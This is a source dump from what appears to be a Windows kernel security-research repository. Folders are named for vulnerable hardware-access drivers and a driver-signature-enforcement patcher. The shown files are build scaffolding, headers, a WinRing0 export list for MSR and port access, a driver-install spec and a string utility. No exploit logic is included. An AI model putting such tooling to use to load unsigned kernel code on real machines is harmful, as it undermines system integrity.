17 | {1103585F-D85D-4599-8858-C0D3E9D7419F}.Debug|x86.Build.0 = Debug|x86
18 | {1103585F-D85D-4599-8858-C0D3E9D7419F}.Release|Any CPU.ActiveCfg = Release|Any CPU
19 | {1103585F-D85D-4599-8858-C0D3E9D7419F}.Release|Any CPU.Build.0 = Release|Any CPU
20 | {1103585F-D85D-4599-8858-C0D3E9D7419F}.Release|x86.ActiveCfg = Release|x86
21 | {1103585F-D85D-4599-8858-C0D3E9D7419F}.Release|x86.Build.0 = Release|x86
22 | EndGlobalSection
23 | GlobalSection(SolutionProperties) = preSolution
24 | HideSolutionNode = FALSE
25 | EndGlobalSection
26 | EndGlobal
27 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINIO/Samples/DumpPort/DumpPort.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 10.00
3 | # Visual Studio 2008
4 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "DumpPort", "DumpPort\DumpPort.csproj", "{8E2C04F3-BDE2-49A4-8736-DE12944D5DDF}"
5 | EndProject
6 | Global
7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
8 | Debug|Any CPU = Debug|Any CPU
9 | Debug|x86 = Debug|x86
10 | Release|Any CPU = Release|Any CPU
11 | Release|x86 = Release|x86
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {8E2C04F3-BDE2-49A4-8736-DE12944D5DDF}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {8E2C04F3-BDE2-49A4-8736-DE12944D5DDF}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {8E2C04F3-BDE2-49A4-8736-DE12944D5DDF}.Debug|x86.ActiveCfg = Debug|x86
17 | {8E2C04F3-BDE2-49A4-8736-DE12944D5DDF}.Debug|x86.Build.0 = Debug|x86
18 | {8E2C04F3-BDE2-49A4-8736-DE12944D5DDF}.Release|Any CPU.ActiveCfg = Release|Any CPU
19 | {8E2C04F3-BDE2-49A4-8736-DE12944D5DDF}.Release|Any CPU.Build.0 = Release|Any CPU
20 | {8E2C04F3-BDE2-49A4-8736-DE12944D5DDF}.Release|x86.ActiveCfg = Release|x86
21 | {8E2C04F3-BDE2-49A4-8736-DE12944D5DDF}.Release|x86.Build.0 = Release|x86
22 | EndGlobalSection
23 | GlobalSection(SolutionProperties) = preSolution
24 | HideSolutionNode = FALSE
25 | EndGlobalSection
26 | EndGlobal
27 |
--------------------------------------------------------------------------------
/source/ROS/win32u/win32u/main.c:
--------------------------------------------------------------------------------
1 | /*******************************************************************************
2 | *
3 | * (C) COPYRIGHT hfiref0x, 2018 - 2019
4 | *
5 | * TITLE: MAIN.C
6 | *
7 | * VERSION: 1.01
8 | *
9 | * DATE: 06 Dec 2019
10 | *
11 | * Syscall stubs for NtUser/NtGdi
12 | *
13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
16 | * PARTICULAR PURPOSE.
17 | *
18 | *******************************************************************************/
19 |
20 | #if !defined UNICODE
21 | #error ANSI build is not supported
22 | #endif
23 |
24 | #if defined (_MSC_VER)
25 | #if (_MSC_VER >= 1900) //VS15, 17 etc
26 | #ifdef _DEBUG
27 | #pragma comment(lib, "vcruntimed.lib")
28 | #pragma comment(lib, "ucrtd.lib")
29 | #else
30 | #pragma comment(lib, "libucrt.lib")
31 | #pragma comment(lib, "libvcruntime.lib")
32 | #endif
33 | #endif
34 | #endif
35 |
36 | #include
37 |
38 | //
39 | // These files are machine generated, do not edit.
40 | //
41 | #ifdef _RELEASE_FOR_CHECKED
42 | #include "w32kcall_checked.h"
43 | #include "w32parguments_checked.h"
44 | #else
45 | #include "w32kcall.h"
46 | #include "w32parguments.h"
47 | #endif
48 |
49 | ULONG W32pServiceLimit = sizeof(W32pServiceArgumentTable);
50 |
--------------------------------------------------------------------------------
/source/StripDebug/cui.h:
--------------------------------------------------------------------------------
1 | /*******************************************************************************
2 | *
3 | * (C) COPYRIGHT AUTHORS, 2016 - 2018
4 | *
5 | * TITLE: CUI.H
6 | *
7 | * VERSION: 1.30
8 | *
9 | * DATE: 01 Aug 2018
10 | *
11 | * Common header file for console ui.
12 | *
13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
16 | * PARTICULAR PURPOSE.
17 | *
18 | *******************************************************************************/
19 | #pragma once
20 |
21 | VOID cuiInitialize(
22 | _In_ BOOL InitInput,
23 | _Out_opt_ PBOOL IsConsoleOutput
24 | );
25 |
26 | #ifdef _UNICODE
27 | #define cuiPrintText cuiPrintTextW
28 | #define cuiPrintTextLastError cuiPrintTextLastErrorW
29 | #else
30 | #define cuiPrintText cuiPrintTextA
31 | #define cuiPrintTextLastError cuiPrintTextLastErrorA
32 | #endif
33 |
34 |
35 | VOID cuiPrintTextA(
36 | _In_ LPSTR lpText,
37 | _In_ BOOL UseReturn
38 | );
39 |
40 | VOID cuiPrintTextW(
41 | _In_ LPWSTR lpText,
42 | _In_ BOOL UseReturn
43 | );
44 |
45 | VOID cuiPrintTextLastErrorA(
46 | _In_ BOOL UseReturn
47 | );
48 |
49 | VOID cuiPrintTextLastErrorW(
50 | _In_ BOOL UseReturn
51 | );
52 |
53 | VOID cuiClrScr(
54 | VOID
55 | );
56 |
--------------------------------------------------------------------------------
/source/DSEPatch/DSEPatch/cui/cui.h:
--------------------------------------------------------------------------------
1 | /*******************************************************************************
2 | *
3 | * (C) COPYRIGHT AUTHORS, 2016 - 2018
4 | *
5 | * TITLE: CUI.H
6 | *
7 | * VERSION: 1.30
8 | *
9 | * DATE: 01 Aug 2018
10 | *
11 | * Common header file for console ui.
12 | *
13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
16 | * PARTICULAR PURPOSE.
17 | *
18 | *******************************************************************************/
19 | #pragma once
20 |
21 | VOID cuiInitialize(
22 | _In_ BOOL InitInput,
23 | _Out_opt_ PBOOL IsConsoleOutput
24 | );
25 |
//
// Generic-text aliases: map cuiPrintText / cuiPrintTextLastError to the wide
// (...W) or ANSI (...A) routine declared below.
// NOTE(review): the switch is keyed on _UNICODE, while global.h in this
// project enforces UNICODE. If a build defines only UNICODE, these aliases
// resolve to the ...A routines although the rest of the program is built for
// wide strings - confirm that the project settings define both symbols.
//
#ifdef _UNICODE
#define cuiPrintText cuiPrintTextW
#define cuiPrintTextLastError cuiPrintTextLastErrorW
#else
#define cuiPrintText cuiPrintTextA
#define cuiPrintTextLastError cuiPrintTextLastErrorA
#endif
33 |
34 |
35 | VOID cuiPrintTextA(
36 | _In_ LPSTR lpText,
37 | _In_ BOOL UseReturn
38 | );
39 |
40 | VOID cuiPrintTextW(
41 | _In_ LPWSTR lpText,
42 | _In_ BOOL UseReturn
43 | );
44 |
45 | VOID cuiPrintTextLastErrorA(
46 | _In_ BOOL UseReturn
47 | );
48 |
49 | VOID cuiPrintTextLastErrorW(
50 | _In_ BOOL UseReturn
51 | );
52 |
53 | VOID cuiClrScr(
54 | VOID
55 | );
56 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINRING0/dll/sys/OpenLibSys.rc:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
4 | #define VER_FILETYPE VFT_DRV
5 | #define VER_FILESUBTYPE VFT2_DRV_SYSTEM
6 |
7 | #define VER_FILEDESCRIPTION_STR "WinRing0"
8 | #define VER_INTERNALNAME_STR "WinRing0.sys"
9 |
10 | /////////////////////////////////////////////////////////////////////////////
11 | //
12 | // Version
13 | //
14 |
// Version resource embedded in the built image.
// NOTE(review): the numeric fields below are literals and do not reference
// the VER_FILETYPE / VER_FILESUBTYPE macros defined at the top of this file.
// FILETYPE 0x2L is VFT_DLL, whereas VER_FILETYPE is VFT_DRV, and FILESUBTYPE
// 0x0L is VFT2_UNKNOWN rather than VFT2_DRV_SYSTEM.
// The strings in this block are descriptive metadata chosen at build time and
// can be set to anything by whoever rebuilds the file; identifying a given
// binary should rest on its signature and hash, not on these fields.
VS_VERSION_INFO VERSIONINFO
 FILEVERSION 1, 2, 0, 5
 PRODUCTVERSION 1, 2, 0, 5
 FILEFLAGSMASK 0x3fL
 FILEFLAGS 0x0L
 FILEOS 0x40004L
 FILETYPE 0x2L
 FILESUBTYPE 0x0L
BEGIN
    BLOCK "StringFileInfo"
    BEGIN
        // "041104b0": language 0x0411 with code page 0x04b0 (1200), matching
        // the Translation value in VarFileInfo below.
        BLOCK "041104b0"
        BEGIN
            VALUE "Comments", "The modified BSD license\0"
            VALUE "CompanyName", "OpenLibSys.org\0"
            VALUE "FileDescription", "WinRing0\0"
            VALUE "FileVersion", "1.2.0.5\0"
            VALUE "InternalName", "WinRing0.sys\0"
            VALUE "LegalCopyright", "Copyright (C) 2007-2008 OpenLibSys.org. All rights reserved.\0"
            VALUE "OriginalFilename", "WinRing0.sys\0"
            VALUE "ProductName", "WinRing0\0"
            VALUE "ProductVersion", "1.2.0.5\0"
        END
    END
    BLOCK "VarFileInfo"
    BEGIN
        VALUE "Translation", 0x411, 1200
    END
END
44 |
--------------------------------------------------------------------------------
/source/ROS/win32u/win32u.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.29519.87
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "win32u", "win32u\win32u.vcxproj", "{8AF1DA16-D7F8-4814-BF5D-526456A574B2}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x86 = Debug|x86
11 | Release|x86 = Release|x86
12 | ReleaseForChecked|x86 = ReleaseForChecked|x86
13 | EndGlobalSection
14 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
15 | {8AF1DA16-D7F8-4814-BF5D-526456A574B2}.Debug|x86.ActiveCfg = Debug|Win32
16 | {8AF1DA16-D7F8-4814-BF5D-526456A574B2}.Debug|x86.Build.0 = Debug|Win32
17 | {8AF1DA16-D7F8-4814-BF5D-526456A574B2}.Release|x86.ActiveCfg = Release|Win32
18 | {8AF1DA16-D7F8-4814-BF5D-526456A574B2}.Release|x86.Build.0 = Release|Win32
19 | {8AF1DA16-D7F8-4814-BF5D-526456A574B2}.ReleaseForChecked|x86.ActiveCfg = ReleaseForChecked|Win32
20 | {8AF1DA16-D7F8-4814-BF5D-526456A574B2}.ReleaseForChecked|x86.Build.0 = ReleaseForChecked|Win32
21 | EndGlobalSection
22 | GlobalSection(SolutionProperties) = preSolution
23 | HideSolutionNode = FALSE
24 | EndGlobalSection
25 | GlobalSection(ExtensibilityGlobals) = postSolution
26 | SolutionGuid = {487B1FDE-0E17-47E1-80E2-16076184F850}
27 | EndGlobalSection
28 | EndGlobal
29 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINIO/Samples/DumpPhys/DumpPhys/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("DumpPhys")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("www.internals.com")]
12 | [assembly: AssemblyProduct("DumpPhys")]
13 | [assembly: AssemblyCopyright("Copyright © Yariv Kaplan 2010")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("16fd1afb-d769-4e14-89ba-eef3670c272b")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | [assembly: AssemblyVersion("1.0.0.0")]
33 | [assembly: AssemblyFileVersion("1.0.0.0")]
34 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINIO/Samples/DumpPort/DumpPort/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("DumpPort")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("www.internals.com")]
12 | [assembly: AssemblyProduct("DumpPort")]
13 | [assembly: AssemblyCopyright("Copyright © Yariv Kaplan 2010")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("e4aa10c8-3c4e-4ea5-8461-4da84bf602f5")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | [assembly: AssemblyVersion("1.0.0.0")]
33 | [assembly: AssemblyFileVersion("1.0.0.0")]
34 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/PHYMEM/PCIFlt/PCIFilter.h:
--------------------------------------------------------------------------------
1 | #ifndef __PCIFILTER_H
2 | #define __PCIFILTER_H
3 |
4 | typedef enum tagDEVICE_PNP_STATE
5 | {
6 | NotStarted=0, // Not started yet
7 | Started, // Device has received the START_DEVICE IRP
8 | StopPending, // Device has received the QUERY_STOP IRP
9 | Stopped, // Device has received the STOP_DEVICE IRP
10 | RemovePending, // Device has received the QUERY_REMOVE IRP
11 | SurpriseRemovePending, // Device has received the SURPRISE_REMOVE IRP
12 | Deleted // Device has received the REMOVE_DEVICE IRP
13 | } DEVICE_PNP_STATE;
14 |
//
// PnP state helpers. _Data_ is a pointer to a structure that has
// DevicePnPState and PreviousPnPState members (DEVICE_EXTENSION in this
// header).
// NOTE(review): each macro expands to bare statement(s) ending in ';' and is
// not wrapped in do { } while (0). When one is used as the body of an
// unbraced if/else or loop, only its first statement is controlled by the
// condition, so call sites need braces. _Data_ is also evaluated more than
// once, so it must not have side effects.
//

// Set both the current and the previous state to NotStarted.
#define INITIALIZE_PNP_STATE(_Data_) \
        (_Data_)->DevicePnPState=NotStarted;\
        (_Data_)->PreviousPnPState=NotStarted;

// Save the current state as the previous one, then switch to _state_.
#define SET_NEW_PNP_STATE(_Data_, _state_) \
        (_Data_)->PreviousPnPState=(_Data_)->DevicePnPState; \
        (_Data_)->DevicePnPState=(_state_);

// Roll the current state back to the saved previous state.
#define RESTORE_PREVIOUS_PNP_STATE(_Data_) \
        (_Data_)->DevicePnPState=(_Data_)->PreviousPnPState;
25 |
26 | typedef struct tagDEVICE_EXTENSION
27 | {
28 | //physical device object
29 | PDEVICE_OBJECT pdo;
30 |
31 | //the device object we attached to
32 | PDEVICE_OBJECT lowerdo;
33 |
34 | //current pnp state
35 | DEVICE_PNP_STATE DevicePnPState;
36 |
37 | //previous pnp state
38 | DEVICE_PNP_STATE PreviousPnPState;
39 |
40 | //Remove Lock
41 | IO_REMOVE_LOCK rmLock;
42 |
43 | } DEVICE_EXTENSION, *PDEVICE_EXTENSION;
44 |
45 | #endif //__PCIFILTER_H
--------------------------------------------------------------------------------
/source/DSEPatch/DSEPatch/instdrv.h:
--------------------------------------------------------------------------------
1 | /*******************************************************************************
2 | *
3 | * (C) COPYRIGHT AUTHORS, 2015 - 2017, portions (C) Mark Russinovich, FileMon
4 | *
5 | * TITLE: INSTDRV.H
6 | *
7 | * VERSION: 1.10
8 | *
9 | * DATE: 17 Apr 2017
10 | *
11 | * Common header file for the program SCM usage.
12 | *
13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
16 | * PARTICULAR PURPOSE.
17 | *
18 | *******************************************************************************/
19 | #pragma once
20 |
21 | BOOL scmInstallDriver(
22 | _In_ SC_HANDLE SchSCManager,
23 | _In_ LPCTSTR DriverName,
24 | _In_opt_ LPCTSTR ServiceExe
25 | );
26 |
27 | BOOL scmStartDriver(
28 | _In_ SC_HANDLE SchSCManager,
29 | _In_ LPCTSTR DriverName
30 | );
31 |
32 | BOOL scmOpenDevice(
33 | _In_ LPCTSTR DriverName,
34 | _Inout_opt_ PHANDLE lphDevice
35 | );
36 |
37 | BOOL scmStopDriver(
38 | _In_ SC_HANDLE SchSCManager,
39 | _In_ LPCTSTR DriverName
40 | );
41 |
42 | BOOL scmRemoveDriver(
43 | _In_ SC_HANDLE SchSCManager,
44 | _In_ LPCTSTR DriverName
45 | );
46 |
47 | BOOL scmUnloadDeviceDriver(
48 | _In_ LPCTSTR Name
49 | );
50 |
51 | BOOL scmLoadDeviceDriver(
52 | _In_ LPCTSTR Name,
53 | _In_opt_ LPCTSTR Path,
54 | _Inout_ PHANDLE lphDevice
55 | );
56 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINRING0/dll/OlsApi.def:
--------------------------------------------------------------------------------
1 | EXPORTS
2 |
3 | GetDllStatus @1
4 | GetDllVersion @2
5 | GetDriverVersion @3
6 | GetDriverType @4
7 |
8 | InitializeOls @7
9 | DeinitializeOls @8
10 |
11 | IsCpuid @11
12 | IsMsr @12
13 | IsTsc @13
14 |
15 | Hlt @20
16 | Rdmsr @21
17 | Wrmsr @22
18 | Rdpmc @23
19 | Cpuid @24
20 | Rdtsc @25
21 |
22 | HltTx @30
23 | RdmsrTx @31
24 | WrmsrTx @32
25 | RdpmcTx @33
26 | CpuidTx @34
27 | RdtscTx @35
28 |
29 | HltPx @40
30 | RdmsrPx @41
31 | WrmsrPx @42
32 | RdpmcPx @43
33 | CpuidPx @44
34 | RdtscPx @45
35 |
36 | ReadIoPortByte @51
37 | ReadIoPortWord @52
38 | ReadIoPortDword @53
39 | WriteIoPortByte @54
40 | WriteIoPortWord @55
41 | WriteIoPortDword @56
42 |
43 | ReadIoPortByteEx @61
44 | ReadIoPortWordEx @62
45 | ReadIoPortDwordEx @63
46 | WriteIoPortByteEx @64
47 | WriteIoPortWordEx @65
48 | WriteIoPortDwordEx @66
49 |
50 | SetPciMaxBusIndex @70
51 |
52 | ReadPciConfigByte @81
53 | ReadPciConfigWord @82
54 | ReadPciConfigDword @83
55 | WritePciConfigByte @84
56 | WritePciConfigWord @85
57 | WritePciConfigDword @86
58 | FindPciDeviceById @87
59 | FindPciDeviceByClass @88
60 |
61 | ReadPciConfigByteEx @91
62 | ReadPciConfigWordEx @92
63 | ReadPciConfigDwordEx @93
64 | WritePciConfigByteEx @94
65 | WritePciConfigWordEx @95
66 | WritePciConfigDwordEx @96
67 |
68 | ;ReadDmiMemory @100
69 | ;ReadPhysicalMemory @101
70 | ;WritePhysicalMemory @102
71 |
--------------------------------------------------------------------------------
/source/IntelNal/src/iqvlinux.spec:
--------------------------------------------------------------------------------
1 | Summary: QV Tools driver
2 | Name: iqvlinux
3 | Version: 1.1.4.5
4 | Release: 0
5 | BuildArch: noarch
6 | License: GPL
7 | Vendor: Intel
8 | Group: System Environment/Kernel
9 | URL: http://www.intel.com
10 |
11 | Source: iqvlinux.tar.gz
12 | BuildRoot: %{_tmppath}/%{name}-%{version}-root
13 |
14 |
15 | %description
16 | Network adapter driver for QV Tools.
17 |
18 | %prep
19 | %setup -c %{name} -n %{name}
20 |
21 | %build
22 |
23 | %install
24 | if [ -d %{buildroot} ]; then
25 | rm -fr %{buildroot}
26 | fi
27 | mkdir -p %{buildroot}/%{_datadir}/%{name}-%{version}-root
28 | make -f Makefile -C src/linux/driver \
29 | NALDIR=/usr/src/redhat/BUILD/%{name} \
30 | DESTDIR=%{buildroot}/%{_datadir}/%{name}-%{version}-root installrpm
31 |
%post
# Install-time scriptlet: rebuilds the driver from the sources shipped under
# the package data directory, runs nalinstall on the build directory, then
# deletes the shipped source tree.
# NOTE(review): the exit status of make and of nalinstall is not checked
# before the rm below, so a failed build or install still removes the
# sources. Package scriptlets normally run with root privileges, so this
# compiles and installs kernel code as root on every install - confirm that
# the target hosts are expected to carry a toolchain and kernel headers.
# V=1 if you want verbose output
make -f Makefile -C %{_datadir}/%{name}-%{version}-root/src/linux/driver \
    NALDIR=%{_datadir}/%{name}-%{version}-root/
%{_datadir}/%{name}-%{version}-root/src/linux/driver/nalinstall %{_datadir}/%{name}-%{version}-root/src/linux/driver
rm -fr %{_datadir}/%{name}-%{version}-root/*
38 |
39 | %verifyscript
40 | if [ ! -e /lib/modules/`uname -r`/kernel/drivers/net/iqvlinux.ko ]
41 | then
42 | echo "QV Linux Driver is missing"
43 | exit 1
44 | fi
45 |
46 | %clean
47 | rm -fr %{buildroot}
48 |
49 | %files
50 | %defattr(-, root, root, 0755)
51 | %{_datadir}/%{name}-%{version}-root/
52 |
53 | %changelog
54 | * %(date "+%a %b %d %Y") %name %{version}
55 | - Automatic build.
56 |
--------------------------------------------------------------------------------
/source/ApiSetSchema/minirtl/_strstr.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
/*
 * Find the first occurrence of the NUL-terminated string sub_s inside the
 * NUL-terminated string s (byte-wise, case-sensitive).
 *
 * Returns a pointer to the start of the match inside s, or 0 when there is
 * no match or either argument is 0. If both arguments are the same pointer,
 * that pointer is returned as is.
 *
 * Unlike the C library strstr, an empty sub_s yields 0 (unless it is the same
 * pointer as s).
 */
char *_strstr_a(const char *s, const char *sub_s)
{
    const char *hay, *needle;
    char first;

    if (s == sub_s)
        return (char *)s;

    if (s == 0 || sub_s == 0)
        return 0;

    first = *sub_s;
    if (first == 0)
        return 0;

    for (;; s++) {
        /* Skip ahead to the next position that starts with the first needle char. */
        while (*s != 0 && *s != first)
            s++;

        if (*s == 0)
            return 0;

        /* Compare the candidate against the whole needle. */
        hay = s;
        needle = sub_s;
        while (*needle != 0 && *hay == *needle) {
            hay++;
            needle++;
        }

        /* Needle exhausted means every character matched. */
        if (*needle == 0)
            return (char *)s;
    }
}
45 |
/*
 * Wide-character counterpart of _strstr_a: find the first occurrence of the
 * NUL-terminated wide string sub_s inside the NUL-terminated wide string s
 * (code-unit comparison, case-sensitive).
 *
 * Returns a pointer to the start of the match inside s, or 0 when there is
 * no match or either argument is 0. If both arguments are the same pointer,
 * that pointer is returned as is.
 *
 * Unlike the C library wcsstr, an empty sub_s yields 0 (unless it is the same
 * pointer as s).
 */
wchar_t *_strstr_w(const wchar_t *s, const wchar_t *sub_s)
{
    const wchar_t *hay, *needle;
    wchar_t first;

    if (s == sub_s)
        return (wchar_t *)s;

    if (s == 0 || sub_s == 0)
        return 0;

    first = *sub_s;
    if (first == 0)
        return 0;

    for (;; s++) {
        /* Skip ahead to the next position that starts with the first needle char. */
        while (*s != 0 && *s != first)
            s++;

        if (*s == 0)
            return 0;

        /* Compare the candidate against the whole needle. */
        hay = s;
        needle = sub_s;
        while (*needle != 0 && *hay == *needle) {
            hay++;
            needle++;
        }

        /* Needle exhausted means every character matched. */
        if (*needle == 0)
            return (wchar_t *)s;
    }
}
88 |
--------------------------------------------------------------------------------
/source/wdextract/wdextract.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 15
4 | VisualStudioVersion = 15.0.28307.539
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "wdextract", "wdextract\wdextract.vcxproj", "{08AEC00F-42ED-4E62-AE8D-0BFCE30A3F57}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {08AEC00F-42ED-4E62-AE8D-0BFCE30A3F57}.Debug|x64.ActiveCfg = Debug|x64
17 | {08AEC00F-42ED-4E62-AE8D-0BFCE30A3F57}.Debug|x64.Build.0 = Debug|x64
18 | {08AEC00F-42ED-4E62-AE8D-0BFCE30A3F57}.Debug|x86.ActiveCfg = Debug|Win32
19 | {08AEC00F-42ED-4E62-AE8D-0BFCE30A3F57}.Debug|x86.Build.0 = Debug|Win32
20 | {08AEC00F-42ED-4E62-AE8D-0BFCE30A3F57}.Release|x64.ActiveCfg = Release|x64
21 | {08AEC00F-42ED-4E62-AE8D-0BFCE30A3F57}.Release|x64.Build.0 = Release|x64
22 | {08AEC00F-42ED-4E62-AE8D-0BFCE30A3F57}.Release|x86.ActiveCfg = Release|Win32
23 | {08AEC00F-42ED-4E62-AE8D-0BFCE30A3F57}.Release|x86.Build.0 = Release|Win32
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {DB1C4BA6-54B6-4E86-9651-1D868FC12E74}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/source/NtCall64_LogParser/NtCall64_LogParser.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 17
4 | VisualStudioVersion = 17.14.36221.1 d17.14
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "NtCall64_LogParser", "NtCall64_LogParser.vcxproj", "{17C7BC46-5AA1-45EB-804F-4FC21BB7FCCF}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {17C7BC46-5AA1-45EB-804F-4FC21BB7FCCF}.Debug|x64.ActiveCfg = Debug|x64
17 | {17C7BC46-5AA1-45EB-804F-4FC21BB7FCCF}.Debug|x64.Build.0 = Debug|x64
18 | {17C7BC46-5AA1-45EB-804F-4FC21BB7FCCF}.Debug|x86.ActiveCfg = Debug|Win32
19 | {17C7BC46-5AA1-45EB-804F-4FC21BB7FCCF}.Debug|x86.Build.0 = Debug|Win32
20 | {17C7BC46-5AA1-45EB-804F-4FC21BB7FCCF}.Release|x64.ActiveCfg = Release|x64
21 | {17C7BC46-5AA1-45EB-804F-4FC21BB7FCCF}.Release|x64.Build.0 = Release|x64
22 | {17C7BC46-5AA1-45EB-804F-4FC21BB7FCCF}.Release|x86.ActiveCfg = Release|Win32
23 | {17C7BC46-5AA1-45EB-804F-4FC21BB7FCCF}.Release|x86.Build.0 = Release|Win32
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {0B79C469-7651-4D66-9453-CB584D41587C}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderC/AmsiProviderServer.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 15
4 | VisualStudioVersion = 15.0.28307.136
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "AmsiProviderServer", "AmsiProviderServer\AmsiProviderServer.vcxproj", "{1B740B58-E395-40B5-8345-1A7265DD727D}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {1B740B58-E395-40B5-8345-1A7265DD727D}.Debug|x64.ActiveCfg = Debug|x64
17 | {1B740B58-E395-40B5-8345-1A7265DD727D}.Debug|x64.Build.0 = Debug|x64
18 | {1B740B58-E395-40B5-8345-1A7265DD727D}.Debug|x86.ActiveCfg = Debug|Win32
19 | {1B740B58-E395-40B5-8345-1A7265DD727D}.Debug|x86.Build.0 = Debug|Win32
20 | {1B740B58-E395-40B5-8345-1A7265DD727D}.Release|x64.ActiveCfg = Release|x64
